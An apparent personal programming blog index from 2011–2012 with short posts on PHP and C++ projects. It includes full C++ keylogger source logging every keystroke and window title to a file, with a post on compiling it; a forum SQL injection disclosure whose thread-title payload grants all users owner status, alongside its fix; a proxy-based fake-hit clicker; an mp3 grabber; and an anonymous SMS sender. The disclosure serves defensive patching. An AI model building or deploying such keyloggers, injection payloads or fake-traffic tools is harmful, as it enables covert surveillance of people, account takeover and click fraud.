Showing posts with label projects. Show all posts
Showing posts with label projects. Show all posts

March 06, 2012

Downloadming grabber script



1. Uses PHP cURL for grabbing.
2. Stores links in XML files.
3. Dynamic page caching mechanism to reduce server overhead.
4. Changes tags automatically or removes them ( including album art).
5. Renames mp3 files to include your website's name.
6. Shows latest updates on main page.

Email me at for demo and download link ( free or paid depending on who you are)!

Selling 10 copies, Sold 2 yet.
Read More

March 05, 2012

Random password generator

No comments:
A very simple program that generates random but secure passwords for you. Place it anywhere on desktop and use it to generate passwords when registering on sites. ;)

1. Generate random passwords
2. Generate even more random passwords?
3. Copy/Vary password length

Read More


This is a good script for grabbers and other websites where dynamic page creation causes too much overhead. The script will cache the page and store it in a database for a specific time period ( defined as lifespan i.e. last parameter of the constructor).
The cached page will be directly sent to browser and script's execution will be terminated. If no cached page is found or a new page is requested, then the script will execute as normal but will cache the page and stored it for future.
Read through comments in the top section of script for instructions related to installation and usage.  
Read More

March 04, 2012

New security bug in Chipmunk forum script

Chipmunk forum script is still used by a few webmasters (including me) so I'm posting this new security vulnerability here and I request all the owners to patch it ASAP.

The problem lies with a SQL query which updates user's current location on forum.


UPDATE <prefix>_users SET userwhere = '$_SESSION[user] is viewing thread: $threadTitle' where username = '$_SESSION[user]'

The variable $threadTitle is actually sanitized before storing it in posts table but when it is retrieved, it regains it's original form. Now this retrieved form is used inside query without escaping which can be easily exploited.

Say original thread title was "Happy new year", the stored one would be "Happy new year" and the retrieved one would be "Happy new year".

Now suppose a notorious user has arrived and he tries follow thread title "',status='9',userwhere=userwhere--", then the stored thread title is "Hacked\',status=\'9\',userwhere=userwhere--". This is okay but when it is retrived, it regains it's original form i.e. "Hacked',status='9',userwhere=userwhere--". When this title is used in the query,
the resulting query becomes

UPDATE <prefix>_users SET userwhere = '$_SESSION[user] is viewing thread:',status='9',userwhere=userwhere--' where username = '$_SESSION[user]'

After re-arranging :

UPDATE <prefix>_users SET userwhere = '$_SESSION[user] is viewing thread: '  ,status='9' , userwhere = userwhere--

When this query is executed, all users are upgraded to a status 9 which is owner's status in Chipmunk forum. Similarly user can craft another set of query to do something else. The hacker can also extend this to inject something inside posts or forum.

How to fix it ?

It's easy! Follow the golden rule : Always sanitize a variable before placing it in a query.

// if you use mysqli
$threadTitle = $db->real_escape_string($threadTitle);
// Or if you use Mysql

$threadTitle = mysql_real_escape_string($threadTitle); 

Then proceed with the query

PS: I have not properly explain how to hack for I don't want anymore to hack anything after reading this blog post.

Don't copy my findings and tutorials.
Don't hack someone's forum based on this knowledge.
Contact me if you've issues implementing the fix.  Good luck and Enjoy!
Read More

March 03, 2012

Upgrading to PHP 5.4 on XAMPP

Here's a quick tutorial on how to upgrade you XAMPP installation to use latest version of PHP that is PHP version 5.4.

1. Download windows build from the official site. ( I had used this link.)

2. Extract all files from the downloaded archive to a temporary folder say php_new.

3. Make sure XAMPP / Apache is not running.

3. Go to the folder where XAMPP is installed and rename the folder XAMPP_ROOT/php to php_old

4. Now go back to our temporary folder i.e. php_new and copy all files to XAMPP_ROOT/php where XAMPP_ROOT is obviously the folder where XAMPP has been installed.

5. Enter the php folder and locate the file(s) php5apache*.dll ( Example php5apache2_2.dll )

6. Copy those files to XAMPP_ROOT/apache/modules/ depending on your version of Apache

7. Optionally delete the folders php_new and php_old

8. Start Apache again and verify that everything is working smoothly by creating a phpinfo file.

9. Don't forget to rename php.ini-production to php.ini and edit it as per your needs. ( Example: set extension_dir to XAMPP_ROOT/php/ext

10. Check Apache logs for any possible errors.
Read More

February 03, 2012

Blogger NCR UserScript

Google has recently changed the way blogspot domains work. Now if you're from Australia, you'll see not
I was annoyed with this new changed because I was always redirected to so I wrote this UserScript for myself.

What does it do ? 

This Userscript lets you always browse the original blogspot blog by automatically sending you to NCR version of that blog.

Author: Me

Read More

January 26, 2012

Auto Clicker - send fake hits on a link


I made the program this morning after getting lots of request from a friend.

Language: Java

Description: A basic program to send fake hits to a link using proxies. It fetches proxies from and accepts proxy lists entered by users. It will not work if target link has Javascript or flash based user tracking mechanism. It will also not work if proxy server is dead.

License: You are free the share the program as it is, without disassembling or modifying the source or removing the credits information.

* You must have JRE installed on your PC for this program to work.
* Tested

Read More

January 15, 2012

How to compile a C++ source

No comments:

*This post is in relation with previous post about Keylogger source. 
*This post is only meant for Windows users

[1]. Download Visual C++ 2010 from Microsoft's. If you're confused about what to download, just download the offline installer and install Visual C++ from inside the ISO archive.

[2]. Install and reboot. Now fire up MS VC++ ( Start>Program Files>MS VC++ express>MS VC++ Express)

[3]. Once opened, create a new Empty project and name it as "Keylogger".

[4]. You should be now having a solution explorer on the right side of Visual C++.

[5]. Now click on Keylogger under solution explorer and select "Add a new item" from the popup menu.

[6]. Select a .cpp source file and call it main.

[7] You should be able to get an empty file - main.cpp.

[8] Paste the source inside main.cpp and compile the source under Release mode. You should see the location of compiled executable in output pane of Visual C++. ( see image below, click to enlarge )

[9]. Navigate to output folder to get the compiled executable. (Kelogger.exe)
Read More

January 04, 2012

[C++] Keylogger source using SetWindowsHookEx

Compiled and tested on MS VC++ 2010 and WinXP.

  • Fully commented source
  • Captures capital and small alphabets, numbers, symbols
  • Logs all special keys like tabs, alt, shift
  • Uses low level keyboard hook to log keys to a text file
  • Very optimized and resource friendly
  • Good for learning
To start logging, compile and execute. To stop logging press CTRL + F12
* A very basic Key logger in C++
* Author: Manish

// Include header files

// Initialize a keyboard HHOOK
HHOOK KeyboardHook;

// Function to write to a file
void write(const char* c)
 const char* fileLocation = "F:\\log.txt"; // Define the location of log file
 FILE *f = fopen(fileLocation,"a+"); // Open the log file in append mode
  fputs(c,f); // Write to end of the file
  fclose(f); // Close the file

// The WIN API Message Loop
void KeepAlive()
    MSG message;
    while (GetMessage(&message,NULL,0,0))

// Unhook and exit
void Exit()

// Is shift key down ?
bool shift = false;
// Store window
HWND oldWindow = NULL;
// Window text
char cWindow[MAX_PATH];

// Callback function to be hooked
LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam)
    bool bControlKeyDown=0;
 // Get current state of capsLock
 bool caps = GetKeyState(VK_CAPITAL) < 0;
 if(nCode == HC_ACTION){
  // Determine the current state of shift key
  if(p->vkCode == VK_LSHIFT || p->vkCode == VK_RSHIFT){
   if(wParam == WM_KEYDOWN)
    shift = true;
    shift = false;
  // Check if F12 + CTRL is pressed, if yes -> exit
  bControlKeyDown = GetAsyncKeyState (VK_CONTROL) >> ((sizeof(SHORT) * 8) - 1);
  if (p->vkCode == VK_F12 && bControlKeyDown) // If F12 and CTRL are pressed
  // Start logging keys
  if(wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN) // If key has been pressed
   HWND newWindow = GetForegroundWindow();
   if(oldWindow == NULL || newWindow != oldWindow){
    // Get Active window title and store it
    GetWindowTextA(GetForegroundWindow(), cWindow, sizeof(cWindow));
    write("\nActive Window: ");
    oldWindow = newWindow;
   // Virtual key codes reference:
   switch(p->vkCode) // Compare virtual keycode to hex values and log keys accordingly
    //Number keys
    case 0x30: write(shift?")":"0");break;
    case 0x31: write(shift?"!":"1");break;
    case 0x32: write(shift?"@":"2");break;
    case 0x33: write(shift?"#":"3");break;
    case 0x34: write(shift?"$":"4");break;
    case 0x35: write(shift?"%":"5");break;
    case 0x36: write(shift?"^":"6");break;
    case 0x37: write(shift?"&":"7");break;
    case 0x38: write(shift?"*":"8");break;
    case 0x39: write(shift?"(":"9");break;
    // Numpad keys
    case 0x60: write("0");break;
    case 0x61: write("1");break;
    case 0x62: write("2");break;
    case 0x63: write("3");break;
    case 0x64: write("4");break;
    case 0x65: write("5");break;
    case 0x66: write("6");break;
    case 0x67: write("7");break;
    case 0x68: write("8");break;
    case 0x69: write("9");break;
    // Character keys
    case 0x41: write(caps?(shift?"a":"A"):(shift?"A":"a"));break;
    case 0x42: write(caps?(shift?"b":"B"):(shift?"B":"b"));break;
    case 0x43: write(caps?(shift?"c":"C"):(shift?"C":"c"));break;
    case 0x44: write(caps?(shift?"d":"D"):(shift?"D":"d"));break;
    case 0x45: write(caps?(shift?"e":"E"):(shift?"E":"e"));break;
    case 0x46: write(caps?(shift?"f":"F"):(shift?"F":"f"));break;
    case 0x47: write(caps?(shift?"g":"G"):(shift?"G":"g"));break;
    case 0x48: write(caps?(shift?"h":"H"):(shift?"H":"h"));break;
    case 0x49: write(caps?(shift?"i":"I"):(shift?"I":"i"));break;
    case 0x4A: write(caps?(shift?"j":"J"):(shift?"J":"j"));break;
    case 0x4B: write(caps?(shift?"k":"K"):(shift?"K":"k"));break;
    case 0x4C: write(caps?(shift?"l":"L"):(shift?"L":"l"));break;
    case 0x4D: write(caps?(shift?"m":"M"):(shift?"M":"m"));break;
    case 0x4E: write(caps?(shift?"n":"N"):(shift?"N":"n"));break;
    case 0x4F: write(caps?(shift?"o":"O"):(shift?"O":"o"));break;
    case 0x50: write(caps?(shift?"p":"P"):(shift?"P":"p"));break;
    case 0x51: write(caps?(shift?"q":"Q"):(shift?"Q":"q"));break;
    case 0x52: write(caps?(shift?"r":"R"):(shift?"R":"r"));break;
    case 0x53: write(caps?(shift?"s":"S"):(shift?"S":"s"));break;
    case 0x54: write(caps?(shift?"t":"T"):(shift?"T":"t"));break;
    case 0x55: write(caps?(shift?"u":"U"):(shift?"U":"u"));break;
    case 0x56: write(caps?(shift?"v":"V"):(shift?"V":"v"));break;
    case 0x57: write(caps?(shift?"w":"W"):(shift?"W":"w"));break;
    case 0x58: write(caps?(shift?"x":"X"):(shift?"X":"x"));break;
    case 0x59: write(caps?(shift?"y":"Y"):(shift?"Y":"y"));break;
    case 0x5A: write(caps?(shift?"z":"Z"):(shift?"Z":"z"));break;
    // Special keys
    case VK_SPACE: write(" "); break;
    case VK_RETURN: write("\n"); break;
    case VK_TAB: write("\t"); break;
    case VK_ESCAPE: write("[ESC]"); break;
    case VK_LEFT: write("[LEFT]"); break;
    case VK_RIGHT: write("[RIGHT]"); break;
    case VK_UP: write("[UP]"); break;
    case VK_DOWN: write("[DOWN]"); break;
    case VK_END: write("[END]"); break;
    case VK_HOME: write("[HOME]"); break;
    case VK_DELETE: write("[DELETE]"); break;
    case VK_BACK: write("[BACKSPACE]"); break;
    case VK_INSERT: write("[INSERT]"); break;
    case VK_LCONTROL: write("[CTRL]"); break;
    case VK_RCONTROL: write("[CTRL]"); break;
    case VK_LMENU: write("[ALT]"); break;
    case VK_RMENU: write("[ALT]"); break;
    case VK_F1: write("[F1]");break;
    case VK_F2: write("[F2]");break;
    case VK_F3: write("[F3]");break;
    case VK_F4: write("[F4]");break;
    case VK_F5: write("[F5]");break;
    case VK_F6: write("[F6]");break;
    case VK_F7: write("[F7]");break;
    case VK_F8: write("[F8]");break;
    case VK_F9: write("[F9]");break;
    case VK_F10: write("[F10]");break;
    case VK_F11: write("[F11]");break;
    case VK_F12: write("[F12]");break;
    // Shift keys
    case VK_LSHIFT: break; // Do nothing
    case VK_RSHIFT: break; // Do nothing
    // Symbol keys
    case VK_OEM_1: write(shift?":":";");break;
    case VK_OEM_2: write(shift?"?":"/");break;
    case VK_OEM_3: write(shift?"~":"`");break;
    case VK_OEM_4: write(shift?"{":"[");break;
    case VK_OEM_5: write(shift?"|":"\\");break;
    case VK_OEM_6: write(shift?"}":"]");break;
    case VK_OEM_7: write(shift?"\"":"'");break;
    case VK_OEM_PLUS: write(shift?"+":"=");break;
    case VK_OEM_COMMA: write(shift?"<":",");break;
    case VK_OEM_MINUS: write(shift?+"_":"-");break;
    case VK_OEM_PERIOD: write(shift?">":".");break;
     DWORD dwMsg = p->scanCode << 16;
                        dwMsg += p->flags << 24;
                        char key[16];
 // Forward the event to other hooks
    return CallNextHookEx(NULL,nCode,wParam,lParam);

// WinAPI main method
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
 // Write to file
 // Hook to all available threads
    KeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, NULL);
  // Keep alive till F12 + CTRL key press is detected - can also register Hotkey
 // Exit the program
    return 0;
Read More

January 02, 2012

[C++ source] List files and directories under Windows

No comments:
This is my first C++ CLI application which asks users to enter a path. If the path is valid, it list all files and transverses through directories while doing so. Tested on WinXP with MSVC++ 2010.
Read More

December 18, 2011

How to create a 'Share on Google plus' button

1 comment:
We have seen websites sporting a 'Share on Facebook' button but I've not stumbled across any website that let's you share something on Google plus by simply clicking a button. Like Facebook's like button, Google has provided webmasters with a +1 button but that only let's you +1 it i.e you can not post your views, opinions whiling pressing the +1 button on a website.

Now you can add a button that allows users to share your website and their opinions on Google plus. Here's how:

This is the Javascript function:

function shareOnPlus(content){''+content);

Now you can associate this function to onclick event of any button or image and let users share you website on G+ like they do on Facebook.


<img src="icons/google_plus.png" alt="Share on Google plus" 
onclick="shareOnPlus('Interesting article at');" 

Share on Google plus

Read More

December 17, 2011

How to create your own way2SMS API

Many web browsers available to smartphone users are unable to display properly and because of that people use unofficial API of Way2SMS provided by some websites like So why not create your own instead of trusting someone else and using their service ?
One afternoon, I came up with this idea and I went ahead and used my skills at PHP to develop one for myself.
I didn't place input validation checks because it was meant for personal user only.
This uses cURL extension so make sure it's available on your server before tying to run this script.

Read More

December 11, 2011

Simple guestbook script


Read More

November 15, 2011

Online jar bookmark creator


This is a simple jar application to launch a URL in the default browser.

Webmasters and Wapmasters can use this to create bookmarks to their websites,wapsites and blogs.
Just enter a URL and an icon and click on the Generate. If you use it on your site, then please link to my blog and also like my blog.

[Example application] - [Create your own]

Hope you guys like it and thanks for reading. :)
Read More

September 28, 2011

Cool signature script

No comments:
This is a quick fun script for people wanting to have a cool signature of different forums. This script will let users add new messages and display them on your signature dynamically. Installation is very easy, just create a file with the following code and another file named 'data.txt' in the same folder. Don't forget to chmod data.txt to 0755.

$sigs = array();
$file = 'data.txt';
$contents = file_get_contents($file);
    $sigs = json_decode($contents);
        $sigs = array();
        $nom = $_POST['nom'];
        $msg = $_POST['msg'];
        if(!empty($nom) && !empty($msg)){
            $nom = preg_replace('@[^a-z0-9 ><_\-\?\.]@i','',$nom);
            $msg = preg_replace('@[^a-z0-9 ><_\-\?\.]@i','',$msg);
            if(!(strlen($nom)<=12 && strlen($msg)<=70)){
                $nom = substr($nom,0,12);
                $msg = substr($msg,0,12);
            $sigs[] = array('time'=>$_SERVER['REQUEST_TIME'],'nom'=>$nom,'msg'=>$msg);
        <img src="?img" alt="" border="0" />
        <br />
        <form method="POST">
        <input type="hidden" value="" name="add" />
        <input type="text" value="" name="nom" size="12" />
        <input type="text" value="" name="msg" size="70" />
        <input type="submit" name="submit" value="Add" />
        echo"<a href='?img'>view sig</a> | <a href='?add'>add msg</a> | <a href='?add&clr'>clear all</a>";
$sigs = json_encode($sigs);
        $sigs = array_reverse($sigs);
        $img = imagecreatetruecolor(800,120);
        $color = imagecolorallocate($img,255,255,255);
        $i = 0;
        foreach($sigs as $sig){
            imagestring($img,15,4,10+($i*20),'| '.$sig->nom.' : '.$sig->msg,$color);
        header('Content-type: image/png');
    echo"<a href='?img'>view sig</a> | <a href='?add'>add msg</a> | <a href='?add&clr'>clear all</a>";

Read More

September 21, 2011

Quick PHP quiz for you guys

Think you know PHP enough ? Take this test and find it out.


Read More

September 08, 2011

HTTP authentication via PHP

No comments:
Here's a small snippet that let's you implement htaccess style http authentication in your PHP scripts. Just define user and password and you are ready to go !

$user = "myuser";
$pass = "mypass";
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER']!=$user || $_SERVER['PHP_AUTH_PW']!=$pass){
    header('WWW-Authenticate: Basic realm="Enter password to access this page."');
    header('HTTP/1.0 401 Unauthorized');
	echo"You must be logged in";
# Your protected contents go here !!

Make sure that this code block is present in topmost of your scripts or it'll give errors and authentication will be messed up.
Read More

September 04, 2011

How to ban Gmail dot and plus trick on registration

No comments:
For gmail users, is same as or or

Although, this feature is there for user's convenience but some cunning people use this for multiple reregistration on a site usually to carry out large scale spamming.

This small snippet can be used to stop users from using plus and dot operator trick for Gmail and hence stop multiple registrations for a single email address.

  • $email = "";
  • if(filter_var($email,FILTER_VALIDATE_EMAIL)){
  •         $email_broken = explode('@',strtolower($email));
  •         if($email_broken[1]==''){
  •                 $mail_without_dot = str_replace('.','',$email_broken[0]).'@'.$email_broken[1];
  •                 $mail_without_plus = preg_replace('@\+.*$@','',$email_broken[0]).'@'.$email_broken[1];
  •         }
  • }

After this, you'll have two variables $mail_without_dot and $mail_without_plus that you can use in simple SQL queries to see if a user has already used that gmail address for registering.
Read More

August 04, 2011

SMS sender - new addition to the blog


I just finished coding an SMS sender script. It works fine for almost all Indian network operators, I've tested. The Message delivery is instant plus you stay anonymous because SMS is not sent from your number. Most probably there are no character limits, tell me if you find a limit. 
I'm adding it to the right sidebar of the blog so that you can enjoy this service on the blog itself.
Now enjoy free anonymous SMS messaging online.
You may contact me for the script.
Read More

August 01, 2011

Facebook app - my new project

No comments:

Check out my new facebook app:
It's a simple app that copies an image from URL to your album.
Read More